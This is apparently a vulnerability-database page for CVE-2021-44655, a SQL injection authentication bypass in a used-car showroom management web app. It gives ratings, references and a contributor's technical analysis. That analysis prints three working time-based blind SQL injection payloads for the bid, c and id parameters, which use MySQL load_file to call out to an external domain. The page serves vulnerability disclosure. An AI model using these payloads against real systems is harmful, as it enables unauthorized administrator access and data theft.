Attacker Value

Very High

(1 user assessed)

Exploitability

Very High

(1 user assessed)

User Interaction

Unknown

Privileges Required

Unknown

Attack Vector

Unknown

CVE-2021-44655

Last updated January 10, 2022

CVE-2021-44655

MITRE ATT&CK

Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Execution

Techniques

Validation

Command and Scripting Interpreter: Python

Validated

User Execution: Malicious Link

Validated

User Execution: Malicious File

Validated

Gives privileged access Vulnerable in default configuration

Description

Online Pre-owned/Used Car Showroom Management System 1.0 contains a SQL injection authentication bypass vulnerability. Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form allowing attacker to get admin access on the application.

Add Assessment

nu11secur1ty (173)

January 14, 2022 7:49am UTC (1 year ago)

Ratings

Attacker Value

Very High

Exploitability

Very High

Gives privileged access Vulnerable in default configuration

Technical Analysis

CVE-2021-44655

Software

Vendor

Description:

The bid, c & id parameters from /used_car_showroom/ node app on Online-Pre-owned/Used Car Showroom Management 1.0 system appear to be vulnerable to Multiple time-based blind SQL injection attacks. The payload ‘+(select load_file(’\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\nxj’))+’ was submitted in the bid parameter. This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator account control on this system. Status: CRITICAL

[+] Payloads:

Multiple: bit, c & id

---
Parameter: bid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=product_per_brand&bid=7'+(select load_file('\\\\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\\nxj'))+'' AND (SELECT 3670 FROM (SELECT(SLEEP(5)))hxug) AND 'ovPl'='ovPl
---


---
Parameter: c (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=categories&c=2'+(select load_file('\\\\xyzk2f5fk3wpwa2tj618b33jbah35vvjmmadx4lt.nu11secur1typenetrationtestingengineers.net\\thk'))+'' AND (SELECT 4821 FROM (SELECT(SLEEP(3)))DuhP) AND 'vkhG'='vkhG
---


---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=view_product&id=3'+(select load_file('\\\\rc7eg9j9yxaja4gnx0f2pxhdp4vxj17sag13srh.nu11secur1typenetrationtestingengineers.net\\deo'))+'' AND (SELECT 8828 FROM (SELECT(SLEEP(3)))VaSc) AND 'gDVf'='gDVf
---

Reproduce:

href

Proof and Exploit:

href

References

Canonical

CVE-2021-44655 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44655)

Miscellaneous

https://www.exploit-db.com/exploits/50560

https://www.nu11secur1ty.com/2021/12/cve-2021-44655.html

https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44655

Rapid7

Very High

CVE-2021-44655

Very High

Very High

Unknown

Unknown

Unknown

CVE-2021-44655

Description

Add Assessment

Ratings

Technical Analysis

CVE-2021-44655

Software

Vendor

Description:

Reproduce:

Proof and Exploit:

General Information

References

Canonical

Miscellaneous

Additional Info

Technical Analysis

Very High

CVE-2021-44655

Very High

Very High

Unknown

Unknown

Unknown

CVE-2021-44655

Description

Add Assessment

Ratings

Technical Analysis

CVE-2021-44655

Software

Vendor

Description:

Reproduce:

Proof and Exploit:

General Information

References

Canonical

Miscellaneous

Additional Info

Technical Analysis

Quick Cookie Notification